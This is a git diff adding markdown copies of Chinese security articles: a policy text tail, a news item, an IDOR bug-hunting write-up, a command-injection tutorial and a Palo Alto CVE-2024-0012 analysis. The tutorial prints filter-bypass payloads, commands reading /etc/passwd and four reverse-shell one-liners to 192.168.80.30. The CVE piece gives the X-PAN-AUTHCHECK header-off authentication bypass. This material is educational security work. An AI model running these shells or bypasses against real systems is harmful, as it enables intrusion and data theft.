——Governments should encourage the use of digital technologies to promote innovative applications in cross-border data flows. They should improve technological capabilities to ensure efficient, convenient and safe cross-border data flows. They should advance international mutual recognition of evaluation standards for technical and security assurance capabilities related to cross-border data flows, and ensure effective intellectual property protection.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should oppose overstretching the concept of national security on data issues. They should object to making restrictive and differentiated policies on cross-border data flows targeting specific countries and enterprises without factual evidence, or implementing discriminatory restrictions, prohibitions, and other similar measures against specific countries and enterprises.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should prohibit illicit acquisition of data through methods such as setting up backdoors in digital products and services or exploiting vulnerabilities in digital technology infrastructure. They should collaborate to crack down on cross-border illegal activities in the data field and jointly safeguard the legitimate rights and interests of citizens and enterprises in all countries.
|
||||||
|
|
||||||
|
|
||||||
|
We are ready to carry out and deepen exchanges and cooperation in the field of cross-border data flows with all parties based on the above initiative. We call on all countries and regions to respond to and endorse the above initiative through bilateral, multilateral, or regional agreements and arrangements. We welcome the support of international organizations, businesses, and civil society for this initiative.
|
||||||
|
|
||||||
|
转载来源:“网信中国”微信公众号
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**中国网络空间安全协会**
|
||||||
|
|
||||||
|
|
||||||
|
**长按识别左侧二维码,关注我们**
|
||||||
|
|
144
doc/几个常见的越权漏洞挖掘案例.md
Normal file
144
doc/几个常见的越权漏洞挖掘案例.md
Normal file
@ -0,0 +1,144 @@
|
|||||||
|
# 几个常见的越权漏洞挖掘案例
|
||||||
|
原创 十二 起凡安全 2024-11-20 09:31
|
||||||
|
|
||||||
|
**水平越权1**
|
||||||
|
|
||||||
|
我的随手拍这里,点击删除抓个包
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
可以看到是ids这个参数控制的
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
回到首页,点个查询抓个包
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
很明显这个ri_ir参数的值就是我们需要的ids
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
直接复制过来发送,回显true
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
记得回首页验证一下这条数据是否被删除
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
一般一个地方有越权,像删除增加或者其他功能点大概率也存在越权
|
||||||
|
|
||||||
|
**水平越权2**
|
||||||
|
|
||||||
|
点击新增功能点
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里选择学号,会先进行查询
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
data参数包含学号
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
直接遍历即可,逻辑很简单,只是功能点不容易被发现
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**垂直越权1**
|
||||||
|
|
||||||
|
接口未做鉴权,只判断了用户是否登录,并没有校验用户是否有相应的权限
|
||||||
|
|
||||||
|
某功能点
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里可以看到无任何数据,用bp开启拦截,F5刷新页面
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
可以看到这是原有的数据包
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里把后面参数全删掉,放包
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
回到浏览器发现返回了全部数据
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里全局搜索下查询的接口,很明显可以看到接口的作用是用来编辑的
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
然后通过查询的接口可以看到字段相关信息
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
直接替换接口,复制上面的字段构造数据包,字段值随便修改,回显操作成功
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
然后通过越权查询可以看到数据已经被修改了
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
对于删除增加的接口都是一样的利用思路,如果有高权限的账号的话,可以直接在低权限没有的功能点进行抓包,然后将cookie替换为低权限用户的,还是正常返回就是存在漏洞
|
||||||
|
|
||||||
|
**垂直越权2**
|
||||||
|
|
||||||
|
本来无任何功能点,注册之后需要审核,但是前端泄露了很多接口
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
返回管理员账号的一些信息
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
按照上一个案例的方法可以越权增加删除等操作
|
||||||
|
|
||||||
|
对于一些小程序、app就需要反编译去找一找接口测试,请求参数肯定是在客户端,总能找到
|
||||||
|
|
||||||
|
|
||||||
|
**利用模糊查询越权**
|
||||||
|
|
||||||
|
查询的功能点,这里没有任何数据
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
参数值为学号
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里后端大概率使用了模糊查询,直接修改为%放包,%代表匹配所有
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
返回了大量敏感信息
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**绕过前端限制**
|
||||||
|
|
||||||
|
包挨骂的水洞专用漏洞:如下图,只能选择这些里面的系统
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里点击保存,把能改的全改成111,假如没有申请人工号这个参数,也可以想办法找到之后手动添加,看看会不会被修改
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
可以看到系统已经选择了111,上面不能修改的申请人也变成了111
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
我这里只是保存草稿讲一下思路,实际还需要提交看看是否提交成功,大概率是能成功的
|
||||||
|
|
495
doc/命令执行漏洞基础.md
Normal file
495
doc/命令执行漏洞基础.md
Normal file
@ -0,0 +1,495 @@
|
|||||||
|
# 命令执行漏洞基础
|
||||||
|
长风实验室 2024-11-20 10:31
|
||||||
|
|
||||||
|
# 一、原理
|
||||||
|
#### 1.命令执行
|
||||||
|
|
||||||
|
**命令执行(Remote Command Execution, RCE)**
|
||||||
|
|
||||||
|
Web应用的脚本代码在执行命令的时候过滤不严,从而注入一段攻击者能够控制的代码在服务器上以Web服务的后台权限远程执行恶意指令
|
||||||
|
|
||||||
|
**成因**
|
||||||
|
|
||||||
|
·
|
||||||
|
代码层过滤不严
|
||||||
|
|
||||||
|
·
|
||||||
|
系统的漏洞造成命令注入
|
||||||
|
|
||||||
|
·
|
||||||
|
调用的第三方组件存在代码执行漏洞
|
||||||
|
|
||||||
|
·
|
||||||
|
常见的命令执行函数
|
||||||
|
|
||||||
|
PHP:exec、shell_exec、system、passthru、popen、proc_open等
|
||||||
|
|
||||||
|
ASP.NET:System.Diagnostics.Start.Process、System.Diagnostics.Start.ProcessStartInfo等
|
||||||
|
|
||||||
|
Java:java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec等
|
||||||
|
|
||||||
|
#### 2.代码执行
|
||||||
|
|
||||||
|
代码执行漏洞由于服务器对危险函数过滤不严导致用户输入的一些字符串可以被转换成代码来执行从而造成代码执行漏洞
|
||||||
|
|
||||||
|
成因
|
||||||
|
|
||||||
|
|
||||||
|
用户能够控制函数输入
|
||||||
|
存在可执行代码的危险函数
|
||||||
|
|
||||||
|
常见代码执行函数
|
||||||
|
|
||||||
|
PHP: eval(),assert(),call_user_func(),create_function(),array_map(),call_user_func_array(),array_filter(),uasort(),preg_replace()
|
||||||
|
|
||||||
|
Javascript: eval
|
||||||
|
|
||||||
|
Vbscript:Execute、Eval
|
||||||
|
|
||||||
|
Python: exec
|
||||||
|
|
||||||
|
#### 3.命令执行与代码执行的区别
|
||||||
|
|
||||||
|
1.命令注入则是调用操作系统命令进行执行
|
||||||
|
|
||||||
|
2.代码执行漏洞是靠执行脚本代码调用操作系统命令
|
||||||
|
#### 4.危害
|
||||||
|
|
||||||
|
可以执行代码、系统命令进行文件读写,文件上传、反弹shell等操作
|
||||||
|
### 二、代码执行函数
|
||||||
|
#### 1. eval()
|
||||||
|
|
||||||
|
1.eval() 函数把字符串按照 PHP 代码来计算。
|
||||||
|
|
||||||
|
2.该字符串必须是合法的 PHP 代码,且必须以分号结尾。
|
||||||
|
|
||||||
|
**使用eval()函数有时候需要添加 ?>**
|
||||||
|
|
||||||
|
原因是eval()函数相当于执行php的代码,而<?= 就相当于<?php echo在PHP7以上不管short_open_tag配置是不是开启的。都可以使用。所以就相当于一个新的PHP文件,这样的话就需要将最开始前面的<?php给闭合,不然不会执行。闭合之后就相当于
|
||||||
|
|
||||||
|
=`ls`;
|
||||||
|
#### 2. assert()
|
||||||
|
|
||||||
|
assert函数是直接将传入的参数当成PHP代码执行,不需要以分号结尾(特别注意),有时加上分号不会显示结果
|
||||||
|
#### 3. ${}
|
||||||
|
|
||||||
|
${ } 会把{}内的php代码或系统命令解析执行
|
||||||
|
|
||||||
|
[MISSING IMAGE: , ]
|
||||||
|
#### 4. call_user_func()
|
||||||
|
|
||||||
|
把第一个参数作为回调函数调用(如下图,call_user_func()里面有两个参数,a会作为回调函数调用b)
|
||||||
|
|
||||||
|
第一个参数 callback 是被调用的回调函数其余参数是回调函数的参数
|
||||||
|
|
||||||
|
[MISSING IMAGE: , ]
|
||||||
|
|
||||||
|
mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )
|
||||||
|
#### 5. create_function()
|
||||||
|
|
||||||
|
用来创建匿名函数,执行代码
|
||||||
|
|
||||||
|
·
|
||||||
|
args是要创建的函数的参数
|
||||||
|
|
||||||
|
·
|
||||||
|
code是函数内的代码
|
||||||
|
|
||||||
|
create_function(string $args,string $code)
|
||||||
|
#### 6. array_map
|
||||||
|
|
||||||
|
为数组的每个元素应用回调函数
|
||||||
|
|
||||||
|
[MISSING IMAGE: , ]
|
||||||
|
#### 7. call_user_func_array()
|
||||||
|
|
||||||
|
回调函数,参数为数组
|
||||||
|
|
||||||
|
第一个参数作为回调函数(callback)调用把参数数组作(param_arr)为回调函数的的参数传入
|
||||||
|
|
||||||
|
call_user_func_array ( callable $callback , array $param_arr )
|
||||||
|
#### 8. array_filter()
|
||||||
|
|
||||||
|
依次将 array 数组中的每个值传递到 callback 函数如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中数组的键名保留不变。
|
||||||
|
|
||||||
|
array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )
|
||||||
|
#### 9. uasort()
|
||||||
|
|
||||||
|
1使用自定义函数对数组进行排序
|
||||||
|
|
||||||
|
本函数将用用户自定义的比较函数对一个数组中的值进行排序
|
||||||
|
如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数
|
||||||
|
|
||||||
|
bool usort ( array &$array , callable $value_compare_func )
|
||||||
|
### 三、命令执行函数
|
||||||
|
#### 1. echo
|
||||||
|
|
||||||
|
可以用于圆括号不能用的场景
|
||||||
|
|
||||||
|
如:
|
||||||
|
|
||||||
|
echo`cat flag.php`;
|
||||||
|
#### 2. system
|
||||||
|
|
||||||
|
该函数会把执行结果输出并把输出结果的最后一行作为字符串返回如果执行失败则返回false这个也最为常用
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
highlight_file(__FILE__);
|
||||||
|
|
||||||
|
system('pwd');
|
||||||
|
|
||||||
|
system('whoami');
|
||||||
|
|
||||||
|
?>
|
||||||
|
#### 3. exec
|
||||||
|
|
||||||
|
不输出结果返回执行结果的最后一行可以使用output进行输出
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
highlight_file(__FILE__);
|
||||||
|
|
||||||
|
exec('pwd',$b);
|
||||||
|
|
||||||
|
var_dump($b);
|
||||||
|
|
||||||
|
?>
|
||||||
|
#### 4. passthru
|
||||||
|
|
||||||
|
此函数只调用命令并把运行结果原样地直接输出没有返回值。
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
highlight_file(__FILE__);
|
||||||
|
|
||||||
|
passthru('ls');
|
||||||
|
|
||||||
|
?>
|
||||||
|
#### 5. shell_exec
|
||||||
|
|
||||||
|
不输出结果,返回执行结果使用反引号(``)时调用的就是此函数
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
highlight_file(__FILE__);
|
||||||
|
|
||||||
|
var_dump(shell_exec('ls'));
|
||||||
|
|
||||||
|
?>
|
||||||
|
#### 6. ob_start
|
||||||
|
|
||||||
|
此函数将打开输出缓冲当输出缓冲激活后,脚本将不会输出内容(除http标头外)相反需要输出的内容被存储在内部缓冲区中。
|
||||||
|
|
||||||
|
内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中想要输出存储在内部缓冲区中的内容,可以使用 ob_end_flush() 函数另外, 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
ob_start("system");
|
||||||
|
|
||||||
|
echo "whoami";
|
||||||
|
|
||||||
|
ob_end_flush();
|
||||||
|
|
||||||
|
?>
|
||||||
|
#### 7. 命令连接符
|
||||||
|
|
||||||
|
Windows和Linux都支持的命令连接符:
|
||||||
|
|
||||||
|
cmd1 | cmd2 只执行cmd2
|
||||||
|
|
||||||
|
cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行
|
||||||
|
|
||||||
|
cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2
|
||||||
|
|
||||||
|
cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2
|
||||||
|
|
||||||
|
Linux还支持分号;
|
||||||
|
|
||||||
|
cmd1 ; cmd2
|
||||||
|
|
||||||
|
按顺序依次执行,先执行cmd1再执行cmd2
|
||||||
|
### 四、绕过姿势
|
||||||
|
#### 1. 关键字绕过
|
||||||
|
|
||||||
|
输出函数
|
||||||
|
|
||||||
|
cat
|
||||||
|
|
||||||
|
tac
|
||||||
|
|
||||||
|
more
|
||||||
|
|
||||||
|
less
|
||||||
|
|
||||||
|
head
|
||||||
|
|
||||||
|
tac
|
||||||
|
|
||||||
|
tail
|
||||||
|
|
||||||
|
nl #nl<fl''ag.php|| nl输出flag有时候只能看见行号,需要打开源代码才能看到内容
|
||||||
|
|
||||||
|
od
|
||||||
|
|
||||||
|
vi
|
||||||
|
|
||||||
|
vim
|
||||||
|
|
||||||
|
sort
|
||||||
|
|
||||||
|
uniq
|
||||||
|
#### 2. 常见分隔符
|
||||||
|
|
||||||
|
换行符 %0a
|
||||||
|
|
||||||
|
回车符 %0d
|
||||||
|
|
||||||
|
连续指令
|
||||||
|
;
|
||||||
|
|
||||||
|
后台进程 &
|
||||||
|
|
||||||
|
管道符 |
|
||||||
|
|
||||||
|
逻辑 ||、&&
|
||||||
|
#### 3. 空格
|
||||||
|
|
||||||
|
可以用以下字符代替空格
|
||||||
|
|
||||||
|
< #tac<fla''g.php||
|
||||||
|
|
||||||
|
> # > 在Linux是追加并覆盖文件的意思,使用该命令需要写的权限
|
||||||
|
|
||||||
|
${IFS}
|
||||||
|
|
||||||
|
$IFS$9
|
||||||
|
|
||||||
|
%0a
|
||||||
|
|
||||||
|
%09 (反引号中只能用%09绕过)
|
||||||
|
|
||||||
|
%20
|
||||||
|
|
||||||
|
%3c
|
||||||
|
|
||||||
|
$@ # cat$@t flag
|
||||||
|
|
||||||
|
$1-$9 # cat$1t flag
|
||||||
|
|
||||||
|
${数字} # cat${1}t flag
|
||||||
|
|
||||||
|
|
||||||
|
$IFS在linux下表示分隔符加一个{}固定了变量名同理在后面加个$可以起到截断的作用
|
||||||
|
|
||||||
|
$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串
|
||||||
|
#### 4. 命令终止符
|
||||||
|
|
||||||
|
%00
|
||||||
|
|
||||||
|
%20
|
||||||
|
#### 5. 通配符
|
||||||
|
|
||||||
|
* 字符被过滤,用
|
||||||
|
“
|
||||||
|
*
|
||||||
|
”
|
||||||
|
号(通配符)代替,如fla* ,通过测试不能与IFS或<这两个字符一起使用
|
||||||
|
|
||||||
|
'' ,
|
||||||
|
“”
|
||||||
|
单引号和双引号截断绕过,如fl''ag.php
|
||||||
|
|
||||||
|
“
|
||||||
|
?
|
||||||
|
”
|
||||||
|
可替代单个字符。
|
||||||
|
“
|
||||||
|
*
|
||||||
|
”
|
||||||
|
可替代任意字符,如fla?.php
|
||||||
|
|
||||||
|
. 如php被过滤,可以 用 p
|
||||||
|
“
|
||||||
|
.
|
||||||
|
”
|
||||||
|
hp
|
||||||
|
#### 6. 反斜杠
|
||||||
|
|
||||||
|
ca\t f\la\g.php
|
||||||
|
#### 7. PHP短标签
|
||||||
|
|
||||||
|
PHP的标签有至少四种:<?php ?>、<?=
|
||||||
|
?>、<script language="php"></script>、<? ?>、<% %>(ASP风格)、<%= %>。
|
||||||
|
|
||||||
|
|
||||||
|
<?=相当于是一个<?php echo
|
||||||
|
|
||||||
|
|
||||||
|
PHP的配置文件php.ini中:
|
||||||
|
|
||||||
|
|
||||||
|
"<? ?>"的支持需要short_open_tag=On,要在XML中使用PHP,需要禁用此标签。
|
||||||
|
|
||||||
|
|
||||||
|
"<%%>"的支持需要asp_tags=On。
|
||||||
|
|
||||||
|
|
||||||
|
"<?= ?>"总是有效的,无论short_open_tag是否设置。
|
||||||
|
|
||||||
|
|
||||||
|
除了<?php ?>和<?=?>其他的标签在PHP7.0.0中被移除,强烈建议使用<?php?>标签,代码才能更好的兼容性。
|
||||||
|
#### 8. 敏感字符绕过
|
||||||
|
##### l 变量绕过
|
||||||
|
|
||||||
|
a=l,b=s;
|
||||||
|
b
|
||||||
|
##### l base64编码绕过
|
||||||
|
|
||||||
|
echo 'cat' | base64
|
||||||
|
|
||||||
|
`echo 'Y2F0Cg==' | base64 -d` test.txt
|
||||||
|
##### l 文件包含绕过
|
||||||
|
|
||||||
|
c=eval($_GET[a]);&a=system('cat fla*');
|
||||||
|
|
||||||
|
c=eval($_GET[a])?>&a=system('cat fla*');#如果过滤了分号,可以用?> 闭合进行绕过
|
||||||
|
|
||||||
|
编码绕过:include$_GET["x"];&x=php://filter/read=convert.base64-encode/resource=flag.php
|
||||||
|
##### l 无参数函数绕过
|
||||||
|
|
||||||
|
数组操作
|
||||||
|
|
||||||
|
array_flip() #交换数组中的键和值
|
||||||
|
|
||||||
|
array_rand() #从数组中随机取出一个或多个单元
|
||||||
|
|
||||||
|
array_reverse() #返回一个单元顺序相反的数组
|
||||||
|
|
||||||
|
current() #返回数组中的当前单元
|
||||||
|
|
||||||
|
文件操作
|
||||||
|
|
||||||
|
file_get_contents() #将整个文件读入一个字符串
|
||||||
|
|
||||||
|
readfile() #读取文件并写入到输出缓冲。
|
||||||
|
|
||||||
|
highlight_file() [别名:show_source()] #语法高亮一个文件
|
||||||
|
|
||||||
|
scandir() #列出指定路径中的文件和目录
|
||||||
|
|
||||||
|
direname() #给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。
|
||||||
|
|
||||||
|
getcwd() #取得当前工作目录。
|
||||||
|
|
||||||
|
chdir($directory) #将 PHP 的当前目录改为 directory。
|
||||||
|
|
||||||
|
读取环境变量
|
||||||
|
|
||||||
|
get_defined_vars() #此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
|
||||||
|
|
||||||
|
getenv() #获取一个环境变量的值
|
||||||
|
|
||||||
|
localeconv() #返回一包含本地数字及货币格式信息的数组,第一个值一直是.
|
||||||
|
|
||||||
|
phpversion() #获取当前的PHP版本
|
||||||
|
|
||||||
|
会话
|
||||||
|
|
||||||
|
session_id() #获取/设置当前会话 ID
|
||||||
|
|
||||||
|
session_start() #启动新会话或者重用现有会话
|
||||||
|
|
||||||
|
其它
|
||||||
|
|
||||||
|
chr():返回指定的字符。
|
||||||
|
|
||||||
|
rand():产生一个随机整数。
|
||||||
|
|
||||||
|
time():返回当前的 Unix 时间戳。
|
||||||
|
|
||||||
|
localtime():取得本地时间。
|
||||||
|
|
||||||
|
localtime(time()) 返回一个数组,Array [0] 为一个 0~60 之间的数字。
|
||||||
|
|
||||||
|
hex2bin():转换十六进制字符串为二进制字符串。
|
||||||
|
|
||||||
|
ceil():进一法取整。
|
||||||
|
|
||||||
|
sinh():双曲正弦。
|
||||||
|
|
||||||
|
cosh():双曲余弦。
|
||||||
|
|
||||||
|
tan():正切。
|
||||||
|
|
||||||
|
floor():舍去法取整。
|
||||||
|
|
||||||
|
sqrt():平方根。
|
||||||
|
|
||||||
|
crypt():单向字符串散列。
|
||||||
|
|
||||||
|
hebrevc:将逻辑顺序希伯来文(logical-Hebrew)转换为视觉顺序希伯来文(visual-Hebrew),并且转换换行符。
|
||||||
|
|
||||||
|
hebrevc(crypt(arg)) [crypt(serialize(array()))]:可以随机生成一个 hash 值 第一个字符随机是 $(大概率) 或者 .(小概率) 然后通过 ord chr 只取第一个字符。
|
||||||
|
|
||||||
|
ord:返回字符串的第一个字符的 ASCII 码值。
|
||||||
|
##### l 未定义的初始化变量
|
||||||
|
|
||||||
|
cat$b /etc/passwd
|
||||||
|
##### l 连接符
|
||||||
|
|
||||||
|
cat /etc/pass'w'd
|
||||||
|
|
||||||
|
例子ls命令我们可以通过以下语法代替执行
|
||||||
|
|
||||||
|
/???/?s --help
|
||||||
|
#### 9. 反向连接(Reverse Shell)的各类技术方法
|
||||||
|
|
||||||
|
- ; perl-e 'use Socket;$i="192.168.80.30";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'
|
||||||
|
|
||||||
|
|
||||||
|
- ; python-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.80.30",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||||
|
|
||||||
|
|
||||||
|
- ; php-r '$sock=fsockopen("192.168.80.30",443);exec("/bin/sh-i<&3 >&3 2>&3");
|
||||||
|
’
|
||||||
|
|
||||||
|
|
||||||
|
- ; ruby-rsocket-e'f=TCPSocket.open("192.168.80.30",443).to_i;execsprintf("/bin/sh-i<&%d >&%d 2>&%d",f,f,f)'
|
||||||
|
#### 10. 一些场景应用
|
||||||
|
|
||||||
|
1、无任何过滤或简单过滤
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
2、过滤了;,|,&,`
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
3、过滤了;,|,&,`,\s
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
4、过滤了关键词,比如cat
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
5、页面无命令结果的回显
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
****
|
||||||
|
**五、****防范措施**
|
||||||
|
|
||||||
|
尽量不要使用系统执行命令
|
||||||
|
|
||||||
|
在进入执行命令函数/方法前,变量要做好过滤,对敏感字符转义
|
||||||
|
|
||||||
|
在使用动态函数前,确保使用的函数是指定的函数之一
|
||||||
|
|
||||||
|
对PHP语言,不能完全控制的危险函数就不要用
|
||||||
|
|
||||||
|
|
61
doc/奇安信集团获2024年世界互联网大会杰出贡献奖.md
Normal file
61
doc/奇安信集团获2024年世界互联网大会杰出贡献奖.md
Normal file
@ -0,0 +1,61 @@
|
|||||||
|
# 奇安信集团获2024年世界互联网大会杰出贡献奖
|
||||||
|
奇安信集团 2024-11-20 10:06
|
||||||
|
|
||||||
|
11月20日,在2024年世界互联网大会乌镇峰会开幕式上,
|
||||||
|
**奇安信集团凭借其在网络安全领域的卓越成就与无限潜力,荣获“世界互联网大会杰出贡献奖”**
|
||||||
|
。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
作为大会亮点之一,世界互联网大会国际组织今年全新设立“世界互联网大会杰出贡献奖”,以表彰在全球互联网相关领域做出杰出贡献的个人和企业,
|
||||||
|
全球仅有14家企业获此殊荣
|
||||||
|
。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
自2016年成立以来,奇安信集团始终深耕网络空间安全领域。2019年5月,中国电子战略入股奇安信,奇安信正式成为网络安全“国家队”;2020年7月22日,奇安信在科创板挂牌上市,开启了全新的发展阶段。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
多年来,奇安信持续发展壮大,不仅在人员、收入规模和产品覆盖度上均位居行业第一,还[连续四年排名“CCIA 中国网安产业竞争力50强”榜单第一](http://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247617283&idx=1&sn=336e1dd4a8322b0944ff0d24911dca99&chksm=fb772d07cc00a411bb44809b2c92c1dc54661a911b81a6c666e7b73249970ad1af918094b8de&scene=21#wechat_redirect)
|
||||||
|
,并被评为北京市第一批“隐形冠军”企业。
|
||||||
|
|
||||||
|
作为2022年北京冬奥会、冬残奥会官方网络安全服务商,奇安信圆满完成了保障任务,实现了冬奥网络安全“零事故”的世界纪录。同时,奇安信积极开拓国际市场,持续推进产品国际化、服务能力国际化和市场能力国际化,并于2023年10月签下[迄今为止中国网络安全出海最大项目](http://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247599565&idx=1&sn=17cf5294eab2e4c95dd97bca33c1d421&chksm=fb7763c9cc00eadf71fb0a56345f286a938634b5d754bd141b2e47a0c3b8bf940b09f591c2cb&scene=21#wechat_redirect)
|
||||||
|
,为海外某国建设网安指挥系统,签约金额近 3亿元人民币,项目有望成为“一带一路”国家标杆项目,推动中国网络安全产业进一步走向世界。
|
||||||
|
|
||||||
|
随着“十四五”规划的深入实施和数字化转型的全面铺开,网络安全需求呈现井喷式增长。作为行业领军者,奇安信将紧跟时代步伐,针对新技术带来的新业态、新业务和新场景,不断创新网络安全解决方案,为政府、企业等用户提供更加全面、有效的安全保障。
|
||||||
|
|
||||||
|
展望未来,奇安信将继续秉承初心与使命,以成为“全球第一的网络安全公司”为愿景目标,不断奋进、勇攀高峰,为构建更加安全、可信的网络空间贡献自己的力量。
|
||||||
|
|
||||||
|
**附2024年世界互联网大会杰出贡献奖获奖企业名单****(排名不分前后)**
|
||||||
|
:
|
||||||
|
|
||||||
|
奇安信集团
|
||||||
|
|
||||||
|
中国电信集团有限公司
|
||||||
|
|
||||||
|
国家电网有限公司
|
||||||
|
|
||||||
|
阿里巴巴(中国)有限公司
|
||||||
|
|
||||||
|
腾讯公司
|
||||||
|
|
||||||
|
超威半导体公司(AMD)
|
||||||
|
|
||||||
|
中兴通讯股份有限公司
|
||||||
|
|
||||||
|
蚂蚁科技集团股份有限公司
|
||||||
|
|
||||||
|
澳门电讯有限公司
|
||||||
|
|
||||||
|
荣耀终端有限公司
|
||||||
|
|
||||||
|
科大讯飞股份有限公司
|
||||||
|
|
||||||
|
印象(上海)数字科技有限公司
|
||||||
|
|
||||||
|
福瑞泰克智能系统有限公司
|
||||||
|
|
||||||
|
海光信息技术股份有限公司
|
||||||
|
|
69
doc/平板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md
Normal file
69
doc/平板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md
Normal file
@ -0,0 +1,69 @@
|
|||||||
|
# 平板锅(Palo Alto)防火墙0day 漏洞分析及Exp
|
||||||
|
独眼情报 2024-11-20 07:42
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
watchTowr的研究人员Sonny近期发布了一份技术分析报告,深入剖析了影响Palo Alto Networks下一代防火墙(NGFW)的两个零日漏洞。这两个漏洞编号为CVE-2024-0012和CVE-2024-9474,已引起包括美国网络安全和基础设施安全局(CISA)在内的多个网络安全机构的高度关注。CISA已将其列入已知漏洞目录,并要求联邦机构必须在12月9日前完成修复。
|
||||||
|
|
||||||
|
CVE-2024-0012是PAN-OS管理Web界面中的一个认证绕过漏洞。根据Sonny的分析,该漏洞允许远程攻击者在无需认证的情况下获得管理员权限。研究人员详细说明了他们的分析方法,从仔细审查Nginx配置文件开始。
|
||||||
|
|
||||||
|
Sonny在分析报告中指出:"查看主要的Nginx路由配置文件/etc/nginx/conf/locations.conf时,发现了一处看似很小但影响巨大的变更。"
|
||||||
|
```
|
||||||
|
add_header Allow "GET, HEAD, POST, PUT, DELETE, OPTIONS";
|
||||||
|
if ($request_method !~ ^(GET|HEAD|POST|PUT|DELETE|OPTIONS)$) {
|
||||||
|
return 405;
|
||||||
|
}
|
||||||
|
|
||||||
|
+proxy_set_header X-Real-IP "";
|
||||||
|
+proxy_set_header X-Real-Scheme "";
|
||||||
|
+proxy_set_header X-Real-Port "";
|
||||||
|
+proxy_set_header X-Real-Server-IP "";
|
||||||
|
+proxy_set_header X-Forwarded-For "";
|
||||||
|
+proxy_set_header X-pan-ndpp-mode "";
|
||||||
|
+proxy_set_header Proxy "";
|
||||||
|
+proxy_set_header X-pan-AuthCheck 'on';
|
||||||
|
|
||||||
|
|
||||||
|
# rewrite_log on;
|
||||||
|
|
||||||
|
# static ones
|
||||||
|
@@ -27,6 +17,5 @@ location /nginx_status {
|
||||||
|
location ~ \.js\.map$ {
|
||||||
|
add_header Cache-Control "no-cache; no-store";
|
||||||
|
proxy_pass_header Authorization;
|
||||||
|
+ include conf/proxy_default.conf;
|
||||||
|
proxy_pass http://$gohost$gohostExt;
|
||||||
|
}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
研究人员发现,在未打补丁的版本中,X-PAN-AUTHCHECK头部设置存在缺陷,这可能导致未经授权的用户访问本应受保护的端点。
|
||||||
|
|
||||||
|
通过利用这个疏忽,研究人员找到了一个简单但破坏力极强的绕过方法:只需将X-PAN-AUTHCHECK HTTP头部设置为off,就能完全禁用认证机制。
|
||||||
|
|
||||||
|
